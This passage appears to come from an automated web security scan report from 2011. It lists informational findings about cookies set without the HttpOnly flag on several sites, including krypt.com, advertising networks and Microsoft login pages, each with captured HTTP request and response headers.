User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:36 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:34:36 GMT; path=/; domain=.krypt.com
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 1051
Content-Type: image/png

.PNG
.
...IHDR...............'n....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

18.335. http://krypt.com/dedicated/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /dedicated/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dedicated/ HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:53 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:34:54 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 26049

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Dedicate
...[SNIP]...

18.336. http://krypt.com/go/promos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /go/promos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/promos HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:53 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:34:54 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 17455

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Promotio
...[SNIP]...

18.337. http://l.betrad.com/ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/15/242/273/0/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/15/242/273/0/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/15/242/273/0/pixel.gif?v=2&ttid=2&d=ad.doubleclick.net&m=5&r=0.43969498621299863 HTTP/1.1
Host: l.betrad.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.16;sz=728x90;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA1QTE4NTBBRTU3Nzk1MjEwQTZFOEN8R0ZmOHpVb1hiV3wxMzAzNjU4NTAxNDIyfDF8MEY2WXJBQmRPUHwwUkV5b1BSTVN6fEVYXzEwMjM0NzcyMDZ8MzMxNjU1?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=79d5aacb-2698-412a-b906-5693b0808956

Response

HTTP/1.1 204 No Content
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=79d5aacb-2698-412a-b906-5693b0808956; path=/; expires=Tue, 23 Apr 2013 15:21:43 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 24 Apr 2011 15:21:43 GMT


18.338. http://l.betrad.com/ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/16/242/273/0/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/16/242/273/0/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/16/242/273/0/pixel.gif?v=2&ttid=2&d=ad.doubleclick.net&m=5&r=0.06532123731449246 HTTP/1.1
Host: l.betrad.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.13;sz=160x600;pc=[TPAS_ID];ord=NERCNDQwMDMwMDA0RkNCQTBBRTU3Qjg4MUMxRDJDNkF8R0ZUYjVIbUd5R3wxMzAzNjU4NTAxMzcyfDF8MEY2WXJBQmRPUHwwUjk5SmFhc1drfEVYXzEwMjM0NzcyMDZ8MzMxNjU1?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=79d5aacb-2698-412a-b906-5693b0808956

Response

HTTP/1.1 204 No Content
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=79d5aacb-2698-412a-b906-5693b0808956; path=/; expires=Tue, 23 Apr 2013 15:29:19 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 24 Apr 2011 15:29:19 GMT


18.339. http://l.betrad.com/ct/0_0_0_0_0_79/us/0/1/0/0/0/0/15/242/273/0/pixel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /ct/0_0_0_0_0_79/us/0/1/0/0/0/0/15/242/273/0/pixel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ct/0_0_0_0_0_79/us/0/1/0/0/0/0/15/242/273/0/pixel.gif?v=2&ttid=2&d=ad.doubleclick.net&m=5&r=0.2666811353992671 HTTP/1.1
Host: l.betrad.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N553.158901.DATAXU/B5114832.6;sz=728x90;pc=[TPAS_ID];ord=NERCNDNGQTAwMDA4NzgwQjBBRTU3RTg4MzBCMTREOEJ8R0Z4SVo3ZkJBZHwxMzAzNjU4NDAyNTg0fDF8MEYzTllTc2l3d3wwUmtQUXJRUkZ5fEVYXzEwMjM0NzcyMDZ8MTM4OTYy?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=79d5aacb-2698-412a-b906-5693b0808956

Response

HTTP/1.1 204 No Content
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=79d5aacb-2698-412a-b906-5693b0808956; path=/; expires=Tue, 23 Apr 2013 15:20:23 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 24 Apr 2011 15:20:23 GMT


18.340. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=lifelock1_cs=1&betq=4353=380320 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=vK5sN5pqHIxFG8povgg3sYARSKMCItdxvhQ3WX8bIMa4F/GCKGexvhQ3gZ8b1qKCaMrBEV7qIEysG/WkBgAoNXAc; GUID=MTMwMzYxNDEyNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 24 Apr 2011 03:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: https://ad.yieldmanager.com/pixel?id=562283&t=2
Set-Cookie: C2=wQ5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAc; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
Set-Cookie: GUID=MTMwMzYxNDUxMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 24 Apr 2011 04:08:32 GMT
Content-Length: 0


18.341. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1303660392&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; wla42=; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14318
Content-Type: text/html; charset=utf-8
Expires: Sun, 24 Apr 2011 15:52:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1303660423&co=1&id=265631; path=/;version=1
Set-Cookie: MSPOK=$uuid-18b94e66-b7b0-49aa-b234-106cb7e83e44; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1Q57 V: 0
Date: Sun, 24 Apr 2011 15:53:43 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1Q57 2011.03.07.16.56.24 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA080, -- Version: 10,0,17133,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

18.342. https://login.silverlight.net/login/createuser.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ocpzfo45cjdd3er2s2e2k155; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:14 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:14 GMT
Content-Length: 9052


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...

18.343. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iwguskeht5pp3amyv0gl5fuz; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 24-Apr-2011 16:03:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:17 GMT
Content-Length: 13113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Sign I
...[SNIP]...

18.344. http://m.webtrends.com/dcs1wotjh10000w0irc493s0e_6x1g/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcs1wotjh10000w0irc493s0e_6x1g/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs1wotjh10000w0irc493s0e_6x1g/dcs.gif?&dcsdat=1303660687258&dcssip=channel9.msdn.com&dcsuri=/&WT.co_f=173.193.214.243-2082981296.30145999&WT.vtid=173.193.214.243-2082981296.30145999&WT.vtvs=1303660687264&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Channel%209%3A%20Videos%20about%20the%20people%20building%20Microsoft%20Products%20%26%20Services&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=980x907&WT.fv=10.2&WT.slv=3.9&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=channel9.msdn.com%2F&WT.z_bdb=1&WT.entryid=Entry%3AFeatureView%3Ac8e3b3a530864206ba469ecc01616d00%3BEntry%3AFeatureView%3Ac381c809f3204eed900f9ecd00018246%3BEntry%3AFeatureView%3Ab6b3f3ffcb9747f1a9bf9ecd00bc40f7%3BEntry%3AFeatureView%3A45bf25f190c24bdfb5899ebe014ba792%3B&WT.sli=Installed&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_nvr1=1&wtEvtSrc=channel9.msdn.com%2F&wtDrillDir=%2F&WT.dep=wtEvtSrc%3BwtDrillDir HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://channel9.msdn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMDgyOTgxMjk2LjMwMTQ1OTk5AAAAAAAFAAAACgAAAIBItE2ASLRNHwEAALlwrU2wcK1NbQEAAHXWsk1q1rJNKwIAAODYsk3U2LJNDQAAAHBItE1wSLRNBAAAABMAAACASLRNgEi0TWYAAAC5cK1NsHCtTXEAAAB11rJNatayTRUAAABwSLRNcEi0TQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 24 Apr 2011 16:00:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs1wotjh10000w0irc493s0e_6x1g/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1303660687258&dcssip=channel9.msdn.com&dcsuri=/&WT.co_f=173.193.214.243-2082981296.30145999&WT.vtid=173.193.214.243-2082981296.30145999&WT.vtvs=1303660687264&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Channel%209%3A%20Videos%20about%20the%20people%20building%20Microsoft%20Products%20%26%20Services&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=980x907&WT.fv=10.2&WT.slv=3.9&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=channel9.msdn.com%2F&WT.z_bdb=1&WT.entryid=Entry%3AFeatureView%3Ac8e3b3a530864206ba469ecc01616d00%3BEntry%3AFeatureView%3Ac381c809f3204eed900f9ecd00018246%3BEntry%3AFeatureView%3Ab6b3f3ffcb9747f1a9bf9ecd00bc40f7%3BEntry%3AFeatureView%3A45bf25f190c24bdfb5899ebe014ba792%3B&WT.sli=Installed&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_nvr1=1&wtEvtSrc=channel9.msdn.com%2F&wtDrillDir=%2F&WT.dep=wtEvtSrc%3BwtDrillDir
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMDgyOTgxMjk2LjMwMTQ1OTk5AAAAAAAGAAAACgAAAIBItE2ASLRNHwEAALlwrU2wcK1NbQEAAHXWsk1q1rJNKwIAAODYsk3U2LJNDQAAAHBItE1wSLRNmwEAABlJtE0ZSbRNBQAAABMAAACASLRNgEi0TWYAAAC5cK1NsHCtTXEAAAB11rJNatayTRUAAABwSLRNcEi0TZgAAAAZSbRNGUm0TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


18.345. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif?&dcsdat=1303660694757&dcssip=technet.microsoft.com&dcsuri=/en-us/edge/&WT.tz=-5&WT.bh=10&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=TechNet%20Edge&WT.js=Yes&WT.jv=1.5&WT.bs=980x907&WT.fi=Yes&WT.fv=10.2&WT.sp=_technet_&WT.dl=0&WT.dcsvid=GUID=845eef4a7ff18745a494666b76292718%26HASH=4aef%26LV=20114%26V=3&WT.dcsdat=1303660694757&WT.wtsv=1&WT.sv_sp=_technet_&WT.co_f=173.193.214.243-2082981296.30145999&WT.vt_f_tlh=1303660687&WT.vt_sid=173.193.214.243-2082981296.30145999.1303660659266&wt_date=2011/4/24&wt_dos=1&wtDrillDir=/en-us/;/en-us/edge/&wtEvtSrc=technet.microsoft.com/en-us/edge/ HTTP/1.1
Host: m.webtrends.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/edge/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMDgyOTgxMjk2LjMwMTQ1OTk5AAAAAAAGAAAACgAAAIxItE2ASLRNHwEAALlwrU2wcK1NbQEAAHXWsk1q1rJNKwIAAODYsk3U2LJNDQAAAHBItE1wSLRNmwEAAIxItE2MSLRNBQAAABMAAACMSLRNgEi0TWYAAAC5cK1NsHCtTXEAAAB11rJNatayTRUAAABwSLRNcEi0TZgAAACMSLRNjEi0TQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 15:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yMDgyOTgxMjk2LjMwMTQ1OTk5AAAAAAAGAAAACgAAAJNItE2ASLRNHwEAALlwrU2wcK1NbQEAAHXWsk1q1rJNKwIAAODYsk3U2LJNDQAAAHBItE1wSLRNmwEAAIxItE2MSLRNBQAAABMAAACTSLRNgEi0TWYAAAC5cK1NsHCtTXEAAAB11rJNatayTRUAAABwSLRNcEi0TZgAAACMSLRNjEi0TQAAAAA-; path=/; expires=Wed, 21-Apr-2021 15:58:11 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

18.346. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

